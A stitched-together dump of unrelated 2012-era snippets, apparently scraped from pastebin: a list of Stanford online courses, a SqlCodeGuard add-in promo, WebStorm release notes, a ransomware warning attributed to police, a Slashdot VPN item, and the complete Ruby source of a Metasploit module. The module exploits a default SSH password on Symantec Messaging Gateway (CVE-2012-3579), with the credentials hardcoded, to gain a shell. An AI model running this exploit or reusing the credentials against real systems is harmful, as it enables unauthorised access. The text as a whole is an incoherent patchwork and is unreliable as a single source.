Coursera https://www.coursera.org/course/ml Dan Boneh, Cryptography, Aug. 27, Coursera https://www.coursera.org/course/crypto Keith Devlin, Introduction to Mathematical Thinking, Sept. 17, Coursera https://www.coursera.org/course/maththink Daphne Koller, Probabilistic Graphical Models, Sept. 24, Coursera https://www.coursera.org/course/pgm Scott Klemmer, Human-Computer Interaction, Sept. 24, Coursera https://www.coursera.org/course/hci Michael Genesereth, Introduction to Logic, Sept. 24, Coursera https://www.coursera.org/course/intrologic Dan McFarland, Organizational Analysis, Sept. 24, Coursera https://www.coursera.org/course/organalysis Kristin Sainani, Writing in the Sciences, Sept. 24, Coursera https://www.coursera.org/course/sciwrite Tim Roughgarden, Algorithms: Design and Analysis, Part 2, October, Coursera https://www.coursera.org/course/algo2 Chuck Eesley, Technology Entrepreneurship, Fall, Venture Lab Venture Lab Tina Seelig, A Crash Course on Creativity, Fall, Venture Lab Venture Lab Paul Kim, Designing a New Learning Environment, Fall, Venture Lab Venture Lab Kay Giesecke, Finance, Fall, Venture Lab Venture Lab Clint Korver, Startup Boards: Advanced Entrepreneurship, Fall, Venture Lab Venture Lab Bruce Clemens, Solar Cells, Fuel Cells and Batteries, Oct. 8, Class2Go http://solar.class.stanford.edu Nick McKeown and Philip Levis, An Introduction to Computer Networks, Oct. 8, Class2Go http://networking.class.stanford.edu Source

Sql Code Guard is a free addin for SSMS (2005/2008/2008R2)* that's provides fast and comprehensive static analysis for T-Sql code, shows code complexity and objects dependencies * Visual studio 2010 and database project are also supported Great news! Now SqlCodeGuard provides simple basic API to use its powerful analyze abilities in yours custom solutions! (assembly and sample project included) Don't be shy - download Sql Code Guard 2.1.4634 (updated 2012-09-09) right now (changelog) Do you have any suggestions? Bugreport? Feel free to contact me SqlCodeGuard <at> gmail.com Code issues Want to be sure that your code is “best practice” compliant? Need check for hidden pitfalls? There it is – Code issues window! You can analyze as single script and the entire database with only few mouse clicks! More than hundred of rules to check – from stylish to potential errors Object dependencies Wondering who use this table? Procedure? Function? Or maybe you want to know – which procedures makes modification to this table or view? Trying to omit well-known error 208? Want to know if you missed some objects? Object dependencies are right for you! Explore your database with single mouse click! Code complexity Worried about you code? It seems too complex to understand? Find complexity of your code! In combination with Code outline you can fast and easy find most complex procedure or function in your database and review it. Code Outline Lost in your “too-complex-to-navigate” procedure? Use Code Outline for quick and simple navigation through workflow of your code! Complexity analyze of each navigated statement provided! SqlCodeGuard - free tool for T-SQL Analyse SqlCodeGuard - free addin for SSMS for static T-Sql analysis

http://www.youtube.com/watch?v=wCVwdvufTds Features Live HTML/CSS/JS editing preview for Google Chrome — no more window-switching needed. Google Closure Compiler JSDoc annotations support Initial Jade templates support Better JavaScript code completion (faster and smarter) Lots of improvements for Sass/SCSS: better code completion, navigation, code formatting and support for advanced constructs JSTestDriver tests debugging Project-level JS libraries and many other changes. System requirements Microsoft Windows 7 (incl.64-bit)/Vista/2003/XP/2000 Intel Pentium III/800 MHz or higher (or compatible) 512 MB free RAM minimum 1 GB RAM recommended 1024x768 minimum screen resolution Instructions Run the WebStorm-*.exe file that starts the Installation Wizard Follow all steps suggested by the wizard. Please pay special attention to the corresponding installation options Download WebStorm 5.0 released: introduces Live Edit and Jade, better JSDoc and Sass/SCSS & more | WebStorm & PhpStorm Blog

The Metropolitan Police have issued an urgent warning about a new ransom malware that is in circulation. Ransomware (also referred to in some cases as cryptoviruses, cryptotrojans or cryptoworms) comprises a class of malware which restricts access to the computer system that it infects, and demands a ransom paid to the creator of the malware in order for the restriction to be removed. Ransomware typically propagates like a typical computer worm, entering a system through, for example, a downloaded file or a vulnerability in a network service. The program will then run a payload which will begin to encrypt personal files on the hard drive. More sophisticated ransomware may hybrid-encrypt the victim's plaintext with a random symmetric key and a fixed public key. The malware author is the only party that knows the needed private decryption key. Some ransomware payloads do not use encryption. In these cases, the payload is simply an application designed to effectively restrict interaction with the system, typically by overriding explorer.exe in the Windows registry as the default shell, or even modify the master boot record, not allowing the operating system to start at all until it is repaired. We request readers to share this article with your friends on all social networks to alert them that this is a fraud and users are advised not to pay out any monies or hand out any bank details. Police advice - Modern ransomware attacks were initially popular within Russia, but in recent years there have been an increasing number of ransomware attacks targeted towards other countries, such as Australia, Germany, and the United States among others. In order to reduce the chances of being infected by this or similar malware we strongly recommend to use Some Best Antiviruses and never forget to update your software & potential vulnerabilities. source

This Metasploit module exploits a default misconfiguration flaw on Symantec Messaging Gateway. The 'support' user has a known default password, which can be used to login to the SSH service, and gain privileged access from remote. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'net/ssh' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell def initialize(info={}) super(update_info(info, 'Name' => "Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability", 'Description' => %q{ This module exploits a default misconfiguration flaw on Symantec Messaging Gateway. The 'support' user has a known default password, which can be used to login to the SSH service, and gain privileged access from remote. }, 'License' => MSF_LICENSE, 'Author' => [ 'Stefan Viehbock', #Original discovery 'Ben Williams', #Reporting the vuln + coordinated release 'sinn3r' #Metasploit ], 'References' => [ ['CVE', '2012-3579'], ['OSVDB', '85028'], ['BID', '55143'], ['URL', 'https://www.sec-consult.com/files/20120829-0_Symantec_Mail_Gateway_Support_Backdoor.txt'], ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'] ], 'DefaultOptions' => { 'ExitFunction' => "none" }, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [ ['Symantec Messaging Gateway 9.5', {}], ], 'Privileged' => true, #Timestamp on Symantec advisory #But was found on Jun 26, 2012 'DisclosureDate' => "Aug 27 2012", 'DefaultTarget' => 0)) register_options( [ Opt::RHOST(), Opt::RPORT(22) ], self.class ) register_advanced_options( [ OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) end def rhost datastore['RHOST'] end def rport datastore['RPORT'] end def do_login(user, pass) opts = { :auth_methods => ['password', 'keyboard-interactive'], :msframework => framework, :msfmodule => self, :port => rport, :disable_agent => true, :config => false, :password => pass, :record_auth_info => true, :proxies => datastore['Proxies'] } opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] begin ssh = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH.start(rhost, user, opts) end rescue Rex::ConnectionError, Rex::AddressInUse return rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" return rescue ::Timeout::Error print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" return rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:#{rport} SSH - Failed authentication" rescue Net::SSH::Exception => e print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" return end if ssh conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true) ssh = nil return conn end return nil end def exploit user = 'support' pass = 'symantec' print_status("#{rhost}:#{rport} - Attempt to login...") conn = do_login(user, pass) if conn print_good("#{rhost}:#{rport} - Login Successful with '#{user}:#{pass}'") handler(conn.lsock) end end end mirror source

"The Pirate Bay team is going to be making the RIAA angry, with the launch of a new ad-supported VPN service. PrivitizeVPN is available for free from The Pirate Bay. Instead of earning revenue through subscription as ipredator does, PrivitizeVPN comes packaged to install the Babylon search bar (adware). PrivitizeVPN appears to be available for Windows users only at the moment. The Pirate Bay staff has a long history of promoting services that have no logs; e.g. , you can't get in trouble if your anonymized IP is subpoenaed by government officials. Although PrivitizeVPN is being released silently, with no press coverage, no official statement, and no comments from The Pirate Bay of any kind, people are assuming that PrivitizeVPN will have the same familiar data protection policies. A backup download location has been setup here for people who have limited access to the Pirate Bay domain." The Pirate Bay Launches Free VPN - Slashdot

pastebin via r00tw0rm